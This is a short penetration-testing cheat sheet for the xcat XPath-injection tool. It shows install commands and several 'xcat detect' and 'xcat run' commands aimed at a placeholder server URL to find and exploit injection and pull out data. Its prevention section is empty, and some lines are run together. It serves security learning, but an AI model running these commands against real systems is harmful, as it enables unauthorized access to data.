Prevention & Tools
Tools: xcat quick reference
pip3 install cython
pip3 install xcatxcat --help
# commands: detect, injections, ip, run, shellDetect classic data exfiltration (GET)
xcat detect "http://<SERVER_IP>:<PORT>/index.php" q "q=BAR" "f=fullstreetname" \
--true-string='!No Result'xcat detect "http://<SERVER_IP>:<PORT>/index.php" f "q=BAR" "f=fullstreetname" \
--true-string='!No Result'xcat run "http://<SERVER_IP>:<PORT>/index.php" q "q=BAR" "f=fullstreetname" \
--true-string='!No Result'Blind injection (POST form)
Prevention
Last updated